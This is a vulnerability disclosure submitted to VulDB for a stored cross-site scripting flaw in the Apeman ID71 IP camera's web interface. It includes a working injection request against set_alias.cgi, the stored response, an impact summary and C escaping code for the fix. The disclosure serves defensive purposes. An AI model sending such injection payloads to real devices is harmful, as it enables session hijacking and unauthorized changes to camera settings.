Submit #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting (information)

Title: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
Description:

The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session.

To store the XSS we can use the following request:

```
# Request
GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1
Host: 192.168.1.151:53370
```

To retrieve the stored value use the following request:

```
# Request
GET /get_status.cgi HTTP/1.1
Host: 192.168.1.151:53370
.....

# Response:
HTTP/1.1 200 OK
Date: Sat Oct 4 11:52:04 2025
Server: GoAhead-Webs

var alias="<script>alert(1)</script>";
var deviceid="VSTD1744XXXXX";
var sys_ver="x.x.x.x";
var app_version="EN75.8.53.20";
var oem_id="XXXX";
var now=17595XXXXXX;
...SNIP....
```

Impact

- Confidentiality: High — theft of session tokens, credentials, and configuration data
- Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users)

Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md

Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful.

From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
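One way the server side could apply context-appropriate encoding to `alias` before writing it into the `get_status.cgi` response, shown as an added example (not code from the submission or from the camera firmware). The function names `js_string_escape` and `format_alias_line` and the buffer sizes are hypothetical.

```c
#include <stdio.h>
#include <stddef.h>

/* Escape `in` for use inside a double-quoted JavaScript string literal.
 * ASCII letters and digits pass through; every other byte becomes \xHH,
 * so quotes, backslashes, '<', '/' and newlines cannot end the literal
 * or an enclosing <script> element. Non-ASCII bytes are escaped one byte
 * at a time: safe, but UTF-8 text would need a \uXXXX encoder to display
 * correctly. Returns bytes written (without NUL), or -1 if `out` is too
 * small, so a truncated value is never emitted. */
int js_string_escape(const char *in, char *out, size_t outsz)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;
    if (outsz == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        int alnum = (*p >= '0' && *p <= '9') || (*p >= 'A' && *p <= 'Z') ||
                    (*p >= 'a' && *p <= 'z');
        if (o + (alnum ? 1 : 4) + 1 > outsz)
            return -1;
        if (alnum) {
            out[o++] = (char)*p;
        } else {
            out[o++] = '\\';
            out[o++] = 'x';
            out[o++] = hex[*p >> 4];
            out[o++] = hex[*p & 0x0F];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Build the `var alias="...";` line in the shape shown in the response. */
int format_alias_line(const char *alias, char *line, size_t linesz)
{
    char esc[256]; /* assumed upper bound for an escaped alias */
    if (js_string_escape(alias, esc, sizeof esc) < 0)
        return -1;
    int n = snprintf(line, linesz, "var alias=\"%s\";\n", esc);
    return (n < 0 || (size_t)n >= linesz) ? -1 : n;
}

int main(void)
{
    char line[512];
    /* Stored value taken from the response shown in the description. */
    if (format_alias_line("<script>alert(1)</script>", line, sizeof line) > 0)
        fputs(line, stdout);
    return 0;
}
```

Escaping at this point only keeps the value inside the string literal. Assuming the pages that read `alias` write it into the DOM, they also need a text sink such as `textContent` rather than `innerHTML` or `document.write`.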
Source: ⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
User: juliourena (UID 90207)
Submission: 04/10/2025 15h01 (8 months ago)
Moderation: 16/10/2025 13h29 (12 days later)
Status: Accepted
VulDB entry: 328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias Cross Site Scripting]
Points: 20
